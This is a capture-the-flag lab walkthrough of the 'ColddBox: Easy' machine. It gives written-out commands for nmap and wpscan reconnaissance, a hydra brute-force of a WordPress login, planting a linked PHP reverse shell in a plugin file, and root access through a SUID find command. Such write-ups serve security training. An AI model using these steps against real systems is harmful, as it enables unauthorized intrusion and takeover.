# ColddBox: Easy ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbxI2XVxRbi_J6HP8TQ%2F-MbxI9paakOr8vV4JYB6%2Fimage.png?alt=media\&token=b88da66b-ba2f-4ade-b0ca-9c9a7562a5cf) ## Reconnaissance Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (**-Pn**) ``` nmap -Pn 10.10.70.76 ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbxI2XVxRbi_J6HP8TQ%2F-MbxIlFuFLbvTrzlk7tR%2Fimage.png?alt=media\&token=fb124fec-0172-4151-a44d-94fc357ce56c) Detailed Nmap Scan : Command Breakdown: * (**-sV):** Service version * (**-sC**): Default nmap scripts * (**-p):** Specifying ports 80 * (**-oN nmap**): Saving it into a file called nmap ``` nmap -sV -sC -p 80 -oN nmap 10.10.70.76 ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbxI2XVxRbi_J6HP8TQ%2F-MbxIpH0PQPf8Rppguj5%2Fimage.png?alt=media\&token=a5063fa5-675e-4269-81f0-f562f68473b6) ## **Enumeration** Lets visit the site ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbxI2XVxRbi_J6HP8TQ%2F-MbxJCImZIZzDvcRSGH1%2Fimage.png?alt=media\&token=d6721d4e-656e-4c22-97ba-bd369e9abdc1) Looks like a well made page, while looking through the website I found a login page. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbxI2XVxRbi_J6HP8TQ%2F-MbxKY8E2dksr6yc8SIz%2Fimage.png?alt=media\&token=03789a84-d586-44d1-b05c-056839832646) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbxI2XVxRbi_J6HP8TQ%2F-MbxKSjlhemZn0OqDrdH%2Fimage.png?alt=media\&token=5094de51-f6ba-4a2b-90e4-a3b933061688) Also looking at the nmap scan, we know that `WordPress 4.1.31` is running, also there is a Wordpress scanner called `wpscan` , lets use it to find more information. ``` wpscan --url http://10.10.70.76/ -e vp,t,u ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbxI2XVxRbi_J6HP8TQ%2F-MbxLB2sQEeNOVGAuQxn%2Fimage.png?alt=media\&token=64e3688e-9cda-4f04-ae3f-5921079626b7) Looking at the output, we find some interesting information ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbxI2XVxRbi_J6HP8TQ%2F-MbxPztXbsah5dhwSy6p%2Fimage.png?alt=media\&token=286ab3af-d44e-4c10-81ed-1598fefbe795) Lets use `hydra` to bruteforce and find atleast one password for one of the users. I saved the usernames in a file called `users`. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbxI2XVxRbi_J6HP8TQ%2F-MbxQW7cRWCHCZIMZGEX%2Fimage.png?alt=media\&token=4a30b66f-8fe5-4778-99c8-4980407305a0) ## Exploitation Lets now use hydra to crack the password ``` hydra -L users -P /usr/share/wordlists/rockyou.txt 10.10.70.76 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbxI2XVxRbi_J6HP8TQ%2F-MbxRd1AKOj06GW3JF1M%2Fimage.png?alt=media\&token=976edd04-71e3-4266-9d4b-a792f9030203) And we get the password, lets login ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbxI2XVxRbi_J6HP8TQ%2F-MbxRvR-YnwREgB653aY%2Fimage.png?alt=media\&token=eff45257-4096-4244-b532-3ca5ebaa6565) We are logged in. For getting a reverse shell on the machine we have to add a reverse shell that you can find [here](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php). First lets go to the `Plugins` tab and then replace one of the plugins with the php reverse shell, also make sure to change the IP to yours. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbxI2XVxRbi_J6HP8TQ%2F-MbxXjVYx1G17laRR35S%2Fimage.png?alt=media\&token=f29ead18-4317-48cb-b62d-20bbc9a6acfd) After changing it, click update file and start a netcat listener. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbxI2XVxRbi_J6HP8TQ%2F-MbxTTgVtRMsD0yo-xei%2Fimage.png?alt=media\&token=5a7f9a9c-619b-48c5-84e6-da77bb81d5e8) Then navigate to the page. ``` http://10.10.58.100/wp-content/plugins/akismet/akismet.php ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbxI2XVxRbi_J6HP8TQ%2F-Mbx_XNnj8jmj3FkePkd%2Fimage.png?alt=media\&token=7271f8dc-3c34-42b0-ace1-39362d6f08ef) You should get a reverse shell. Lets stabilize the shell. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbxI2XVxRbi_J6HP8TQ%2F-Mbxa3mf-Im15CUXylyo%2Fimage.png?alt=media\&token=34403df4-d6d7-42ea-bddd-977bb6510c26) ## Privilege Escalation Lets look for `SUIDs` that we can exploit. ``` find / -perm -u=s -type f 2>/dev/null ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mbxai2m08hk7m6DRX8t%2F-Mbxbaynynf8_na7-lFw%2Fimage.png?alt=media\&token=e5ff3827-f5cc-4ea7-93da-aa1819b5c9a3) We have `/usr/bin/find`, lets go to `GTFOBins` and find the command to privilege escalate. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mbxai2m08hk7m6DRX8t%2F-Mbxbs8Eh1J1N_kVOpQV%2Fimage.png?alt=media\&token=29816fd0-5a8c-41bb-bed3-c6bef39ebd0c) Lets use the second command ``` find . -exec /bin/sh -p \; -quit ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mbxai2m08hk7m6DRX8t%2F-Mbxc4GCKoHCbO2Z_86O%2Fimage.png?alt=media\&token=b984358f-e8f8-4231-90a8-76da134e7459) We are now root.